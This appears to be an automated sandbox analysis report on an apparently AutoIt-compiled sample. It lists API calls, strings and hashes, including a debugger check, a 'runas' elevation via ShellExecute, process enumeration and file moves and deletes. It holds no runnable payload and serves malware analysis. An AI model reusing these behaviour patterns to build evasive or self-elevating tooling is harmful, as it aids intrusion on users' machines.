                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                            • API String ID: 1091760877-2248577382
                                                                            • Opcode ID: 94454520507bf48c8388640cc435af2336e3f0aefe1b7676b2797d4595115628
                                                                            • Instruction ID: 11618be6858b85bc6ec9b42ab82616f1901032e92a2776c36c5193a7b03c8602
                                                                            • Opcode Fuzzy Hash: 94454520507bf48c8388640cc435af2336e3f0aefe1b7676b2797d4595115628
                                                                            • Instruction Fuzzy Hash: 0ED05E3190903177DA0123246D0AFAE79159B27770F608B1EF675652EACF744CA182E5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0019D6C1(void* __ecx) {
                                                                            				struct HRSRC__* _t3;
                                                                            				void* _t5;
                                                                            
                                                                            				_t5 = __ecx;
                                                                            				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
                                                                            				if(_t3 != 0) {
                                                                            					 *((char*)(_t5 + 0x64)) = 1;
                                                                            					return _t3;
                                                                            				}
                                                                            				return _t3;
                                                                            			}






                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,0019CFBE,?), ref: 0019D6C6
                                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0019CFBE,?), ref: 0019D6D4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FindHandleModuleResource
                                                                            • String ID: RTL
                                                                            • API String ID: 3537982541-834975271
                                                                            • Opcode ID: fd2ad08c0ae07194ddf7521c61b6d0c1986d05cf68d33ede2c5bba697d375e6d
                                                                            • Instruction ID: e3a2eda54309d973ef41a38b7494703f5839079a77c645fe45d445ff6a9ce5f1
                                                                            • Opcode Fuzzy Hash: fd2ad08c0ae07194ddf7521c61b6d0c1986d05cf68d33ede2c5bba697d375e6d
                                                                            • Instruction Fuzzy Hash: 1EC0123128132167EB3017307C0DF832E586B10B12F19044AF685DA6D0DAF5D890C6A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Executed Functions

                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 00839911
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                            • _memmove.LIBCMT ref: 0083995C
                                                                              • Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841546
                                                                              • Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841560
                                                                              • Part of subcall function 008414F7: __CxxThrowException@8.LIBCMT ref: 00841571
                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 008399A3
                                                                            • _memmove.LIBCMT ref: 00839FE6
                                                                            • _memmove.LIBCMT ref: 0083A914
                                                                            • _memmove.LIBCMT ref: 00859769
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            • Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                            • String ID:
                                                                            • API String ID: 2383988440-0
                                                                            • Opcode ID: dc92b37ce389a8f6a8272e320c40ff37fa8ebce0c74834c70951e9b0e381d2cf
                                                                            • Instruction ID: 503a1e6a9d8d137afc5a499d04c370eb862d12ad87c5288f5bcf130eeedcce07
                                                                            • Opcode Fuzzy Hash: dc92b37ce389a8f6a8272e320c40ff37fa8ebce0c74834c70951e9b0e381d2cf
                                                                            • Instruction Fuzzy Hash: 25134B74608245CFCB28DF28C485A2AB7E5FF89304F14896DE88ACB355E775E845CB93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0083F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\33920049\fmkkelc.omp,0083F1F5,C:\Users\user\33920049\fmkkelc.omp,008D90E8,C:\Users\user\33920049\fmkkelc.omp,?,0083F1F5,?,?,00000001), ref: 0083F23C
                                                                              • Part of subcall function 008638ED: __wsplitpath.LIBCMT ref: 00863913
                                                                              • Part of subcall function 008638ED: __wsplitpath.LIBCMT ref: 00863935
                                                                              • Part of subcall function 008638ED: __wcsicoll.LIBCMT ref: 00863959
                                                                              • Part of subcall function 0086397D: GetFileAttributesW.KERNELBASE(?), ref: 00863984
                                                                            • _wcscat.LIBCMT ref: 0087BD20
                                                                            • _wcscat.LIBCMT ref: 0087BD49
                                                                            • __wsplitpath.LIBCMT ref: 0087BD76
                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 0087BD8E
                                                                            • _wcscpy.LIBCMT ref: 0087BDFD
                                                                            • _wcscat.LIBCMT ref: 0087BE0F
                                                                            • _wcscat.LIBCMT ref: 0087BE21
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0087BE4D
                                                                            • DeleteFileW.KERNEL32(?), ref: 0087BE5F
                                                                            • MoveFileW.KERNEL32(?,?), ref: 0087BE7F
                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0087BE96
                                                                            • DeleteFileW.KERNEL32(?), ref: 0087BEA1
                                                                            • CopyFileW.KERNELBASE(?,?,00000000), ref: 0087BEB8
                                                                            • FindClose.KERNEL32(00000000), ref: 0087BEBF
                                                                            • MoveFileW.KERNEL32(?,?), ref: 0087BEDB
                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0087BEF0
                                                                            • FindClose.KERNEL32(00000000), ref: 0087BF08
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 2188072990-1173974218
                                                                            • Opcode ID: d9bce159c14150376826149fdd8d9accd79d03e4d7f0d02b4ea0b5161c9b2cf2
                                                                            • Instruction ID: b4b56718f3ec1113726714de48dc190d54c09a120b1a9fa9fba6c5905041c5b7
                                                                            • Opcode Fuzzy Hash: d9bce159c14150376826149fdd8d9accd79d03e4d7f0d02b4ea0b5161c9b2cf2
                                                                            • Instruction Fuzzy Hash: 075161B2404344AAC720DBA4CC45FEB77E9FF85310F448A1DF699C2141EB35E648C7A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
                                                                              • Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00833681
                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00833697
                                                                            • __wsplitpath.LIBCMT ref: 008336C2
                                                                              • Part of subcall function 0084392E: __wsplitpath_helper.LIBCMT ref: 00843970
                                                                            • _wcscpy.LIBCMT ref: 008336D7
                                                                            • _wcscat.LIBCMT ref: 008336EC
                                                                            • SetCurrentDirectoryW.KERNELBASE(?), ref: 008336FC
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                              • Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841546
                                                                              • Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841560
                                                                              • Part of subcall function 008414F7: __CxxThrowException@8.LIBCMT ref: 00841571
                                                                              • Part of subcall function 00833D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0083378C,?,?,?,00000010), ref: 00833D38
                                                                              • Part of subcall function 00833D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00833D71
                                                                            • _wcscpy.LIBCMT ref: 008337D0
                                                                            • _wcslen.LIBCMT ref: 00833853
                                                                            • _wcslen.LIBCMT ref: 008338AD
                                                                            Strings
                                                                            • Error opening the file, xrefs: 008581AF
                                                                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0085817E
                                                                            • Unterminated string, xrefs: 008582C6
                                                                            • _, xrefs: 0083394C
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                            • API String ID: 3393021363-188983378
                                                                            • Opcode ID: 1c76ec717d9c06557eb7decbde03bbbd4c5eeae4933bb1450106abb9aa57276f
                                                                            • Instruction ID: 57ffc8941618f89ccbed0e925f07add7831dfcb1193a8d92b653a7393bce37dd
                                                                            • Opcode Fuzzy Hash: 1c76ec717d9c06557eb7decbde03bbbd4c5eeae4933bb1450106abb9aa57276f
                                                                            • Instruction Fuzzy Hash: B6D18BB1508345AAD711EF68C841AABBBE8FFC5304F04492EF986D7201DB75DA4987E3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0083D7BA
                                                                              • Part of subcall function 00832190: __wcsicoll.LIBCMT ref: 00832262
                                                                              • Part of subcall function 00832190: __wcsicoll.LIBCMT ref: 00832278
                                                                              • Part of subcall function 00832190: __wcsicoll.LIBCMT ref: 0083228E
                                                                              • Part of subcall function 00832190: __wcsicoll.LIBCMT ref: 008322A4
                                                                              • Part of subcall function 00832190: _wcscpy.LIBCMT ref: 008322C4
                                                                            • IsDebuggerPresent.KERNEL32 ref: 0083D7C6
                                                                            • GetFullPathNameW.KERNEL32(C:\Users\user\33920049\fmkkelc.omp,00000104,?,008D7F50,008D7F54), ref: 0083D82D
                                                                              • Part of subcall function 008316A0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 008316E5
                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0083D8A2
                                                                            • MessageBoxA.USER32 ref: 0085E14F
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0085E1A3
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0085E1D3
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0085E21D
                                                                            • ShellExecuteW.SHELL32(00000000), ref: 0085E224
                                                                              • Part of subcall function 008403E0: GetSysColorBrush.USER32(0000000F), ref: 008403EB
                                                                              • Part of subcall function 008403E0: LoadCursorW.USER32(00000000,00007F00), ref: 008403FA
                                                                              • Part of subcall function 008403E0: LoadIconW.USER32 ref: 00840410
                                                                              • Part of subcall function 008403E0: LoadIconW.USER32 ref: 00840423
                                                                              • Part of subcall function 008403E0: LoadIconW.USER32 ref: 00840436
                                                                              • Part of subcall function 008403E0: LoadImageW.USER32 ref: 0084045E
                                                                              • Part of subcall function 008403E0: RegisterClassExW.USER32 ref: 008404AD
                                                                              • Part of subcall function 00840350: CreateWindowExW.USER32 ref: 00840385
                                                                              • Part of subcall function 00840350: CreateWindowExW.USER32 ref: 008403AE
                                                                              • Part of subcall function 00840350: ShowWindow.USER32(?,00000000), ref: 008403C4
                                                                              • Part of subcall function 00840350: ShowWindow.USER32(?,00000000), ref: 008403CE
                                                                              • Part of subcall function 0083E2C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0083E3A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: LoadWindow$Icon__wcsicoll$CurrentDirectoryName$CreateFullPathShow$BrushClassColorCursorDebuggerExecuteFileForegroundImageMessageModuleNotifyPresentRegisterShellShell__wcscpy
                                                                            • String ID: AutoIt$C:\Users\user\33920049\fmkkelc.omp$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                            • API String ID: 1688597619-3601087196
                                                                            • Opcode ID: 9c96d4c1d68d6898f8303937f8aa424612ef19f85b202e60ef3dcab3885020d1
                                                                            • Instruction ID: 093e8b7d07f73ebfc91fbf4a7aa79745604a6495d9967b4f6e8d34567988d499
                                                                            • Opcode Fuzzy Hash: 9c96d4c1d68d6898f8303937f8aa424612ef19f85b202e60ef3dcab3885020d1
                                                                            • Instruction Fuzzy Hash: 56411B70905344ABDB14A7E4EC45BED3778FB88711F000696FA44D7392DE745A8CCBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00863EE2
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00863EF2
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00863F1D
                                                                            • __wsplitpath.LIBCMT ref: 00863F48
                                                                              • Part of subcall function 0084392E: __wsplitpath_helper.LIBCMT ref: 00843970
                                                                            • _wcscat.LIBCMT ref: 00863F5B
                                                                            • __wcsicoll.LIBCMT ref: 00863F6B
                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00863FA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                            • String ID:
                                                                            • API String ID: 2431060436-0
                                                                            • Opcode ID: 61772e26e5ede069f6f527273cbb301a08504101d00ca5f329ab09ebadaf389b
                                                                            • Instruction ID: dc98af9e34c98364cec28afd6eba828f4e0fff495140215decd129a5dcf65736
                                                                            • Opcode Fuzzy Hash: 61772e26e5ede069f6f527273cbb301a08504101d00ca5f329ab09ebadaf389b
                                                                            • Instruction Fuzzy Hash: 8E2171B6800209ABCB21DF54DC88BEAB7B8FB48300F144599F609D7141EB75AB85CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNELBASE(uxtheme.dll,0083EE15,0083D92E), ref: 0083EE3B
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0083EE4D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: IsThemeActive$uxtheme.dll
                                                                            • API String ID: 2574300362-3542929980
                                                                            • Opcode ID: 3e19163424b65cacb9358ec088da8fd8f98fdd1192a880687912a6e253cf6e90
                                                                            • Instruction ID: 5b839561df9fc8b32740f3e4d2daef4e2f1808cc45ddfb03aad8738ab4a46a27
                                                                            • Opcode Fuzzy Hash: 3e19163424b65cacb9358ec088da8fd8f98fdd1192a880687912a6e253cf6e90
                                                                            • Instruction Fuzzy Hash: 21D0C9F490070BDADB304F21C80A60777E4FB44B52F105818A5A1D13E0DB78D480CA64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00000000), ref: 008639AC
                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 008639BD
                                                                            • FindClose.KERNEL32(00000000), ref: 008639D0
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                            • String ID:
                                                                            • API String ID: 48322524-0
                                                                            • Opcode ID: d6739f3801ff695c326824c1845e6154bd2e89fa0700741a2e2295a943cf9613
                                                                            • Instruction ID: 4d2b30d2553180bae6ef5f72ab8267205bcb495718e95703765ac64bd011947a
                                                                            • Opcode Fuzzy Hash: d6739f3801ff695c326824c1845e6154bd2e89fa0700741a2e2295a943cf9613
                                                                            • Instruction Fuzzy Hash: DAE048329155149B8620AB7CFC094E97B9CEF46375F104752FE38D21D0DB70AA904BD6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_0001F12E), ref: 0084F175
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: c0a63729bd218f5d4783ac95edee8168ff6a885b02ab6f941c3a5dca6ee2c931
                                                                            • Instruction ID: a1120603b08cc086670dceaa0dd5ca6695029a03c6cb5f2840cc54f97e08d935
                                                                            • Opcode Fuzzy Hash: c0a63729bd218f5d4783ac95edee8168ff6a885b02ab6f941c3a5dca6ee2c931
                                                                            • Instruction Fuzzy Hash: 5790026465110596474517B09D4950537D0BA5C60274205686211DC666EA5840049711
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            • Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                            • API String ID: 1038674560-3360698832
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Message$Peek$DispatchSleepTranslate
                                                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                            • API String ID: 1762048999-758534266
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0089AC5C
                                                                            • RegCreateKeyExW.KERNELBASE(?,?,00000000,008B4E64,00000000,?,00000000,?,?,?), ref: 0089ACB6
                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0089AD00
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CloseConnectCreateRegistry
                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                            • API String ID: 3217815495-966354055
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00832390: _wcslen.LIBCMT ref: 0083239D
                                                                              • Part of subcall function 00832390: _memmove.LIBCMT ref: 008323C3
                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0089EE0E
                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0089F1FA
                                                                            • IsWindow.USER32(?), ref: 0089F22F
                                                                            • GetDesktopWindow.USER32 ref: 0089F2EB
                                                                            • EnumChildWindows.USER32 ref: 0089F2F2
                                                                            • EnumWindows.USER32(00891059,?), ref: 0089F2FA
                                                                              • Part of subcall function 008759E6: _wcslen.LIBCMT ref: 008759F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                            • API String ID: 329138477-1919597938
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _wcsncpy.LIBCMT ref: 0088CE26
                                                                            • __wsplitpath.LIBCMT ref: 0088CE65
                                                                            • _wcscat.LIBCMT ref: 0088CE78
                                                                            • _wcscat.LIBCMT ref: 0088CE8B
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0088CE9F
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,00000104,?), ref: 0088CEB2
                                                                              • Part of subcall function 0086397D: GetFileAttributesW.KERNELBASE(?), ref: 00863984
                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0088CEF2
                                                                            • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0088CF0A
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0088CF1B
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0088CF2C
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0088CF40
                                                                            • _wcscpy.LIBCMT ref: 0088CF4E
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0088CF91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                            • String ID: *.*
                                                                            • API String ID: 1153243558-438819550
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0083E5FF
                                                                            • __wsplitpath.LIBCMT ref: 0083E61C
                                                                              • Part of subcall function 0084392E: __wsplitpath_helper.LIBCMT ref: 00843970
                                                                            • _wcsncat.LIBCMT ref: 0083E633
                                                                            • __wmakepath.LIBCMT ref: 0083E64F
                                                                              • Part of subcall function 008439BE: __wmakepath_s.LIBCMT ref: 008439D4
                                                                              • Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841546
                                                                              • Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841560
                                                                              • Part of subcall function 008414F7: __CxxThrowException@8.LIBCMT ref: 00841571
                                                                            • _wcscpy.LIBCMT ref: 0083E687
                                                                              • Part of subcall function 0083E6C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0083E6A1), ref: 0083E6DD
                                                                            • _wcscat.LIBCMT ref: 00857324
                                                                            • _wcslen.LIBCMT ref: 00857334
                                                                            • _wcslen.LIBCMT ref: 00857345
                                                                            • _wcscat.LIBCMT ref: 0085735F
                                                                            • _wcsncpy.LIBCMT ref: 0085739F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                            • String ID: Include$\
                                                                            • API String ID: 3173733714-3429789819
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00840513
                                                                            • RegisterClassExW.USER32 ref: 0084053D
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0084054E
                                                                            • InitCommonControlsEx.COMCTL32(008D90E8), ref: 0084056B
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0084057B
                                                                            • LoadIconW.USER32 ref: 00840592
                                                                            • ImageList_ReplaceIcon.COMCTL32(011DC840,000000FF,00000000), ref: 008405A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 008403EB
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 008403FA
                                                                            • LoadIconW.USER32 ref: 00840410
                                                                            • LoadIconW.USER32 ref: 00840423
                                                                            • LoadIconW.USER32 ref: 00840436
                                                                            • LoadImageW.USER32 ref: 0084045E
                                                                            • RegisterClassExW.USER32 ref: 008404AD
                                                                              • Part of subcall function 008404E0: GetSysColorBrush.USER32(0000000F), ref: 00840513
                                                                              • Part of subcall function 008404E0: RegisterClassExW.USER32 ref: 0084053D
                                                                              • Part of subcall function 008404E0: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0084054E
                                                                              • Part of subcall function 008404E0: InitCommonControlsEx.COMCTL32(008D90E8), ref: 0084056B
                                                                              • Part of subcall function 008404E0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0084057B
                                                                              • Part of subcall function 008404E0: LoadIconW.USER32 ref: 00840592
                                                                              • Part of subcall function 008404E0: ImageList_ReplaceIcon.COMCTL32(011DC840,000000FF,00000000), ref: 008405A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: #$0$AutoIt v3
                                                                            • API String ID: 423443420-4155596026
                                                                            • Opcode ID: 025a0b47e319db9b87820ff7df496cdf4a02854451ca5e9a6462d8b8a53f1440
                                                                            • Instruction ID: 268a892bbe13cc380a543b04d14671c5897cd4d339bdc11d6a76125d5656a31a
                                                                            • Opcode Fuzzy Hash: 025a0b47e319db9b87820ff7df496cdf4a02854451ca5e9a6462d8b8a53f1440
                                                                            • Instruction Fuzzy Hash: A221FFB1D05318ABD720DFA9EC45F9A7BB5FB4C704F00425AE608E7291EBB55500CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _malloc
                                                                            • String ID: Default
                                                                            • API String ID: 1579825452-753088835
                                                                            • Opcode ID: 9e630942868e9ed8897d7a8d09e017b9b4983f3050cc2459eea827dcc353d0cf
                                                                            • Instruction ID: f2f32650b6e1588ae0a314cfff805059919cd4bc8c39fb07a85cb5879f395475
                                                                            • Opcode Fuzzy Hash: 9e630942868e9ed8897d7a8d09e017b9b4983f3050cc2459eea827dcc353d0cf
                                                                            • Instruction Fuzzy Hash: CD7269B0604305CFC728DF28C485A2AB7E5FF99315F248969E986CB352D735E849CB93
                                                                            Uniqueness

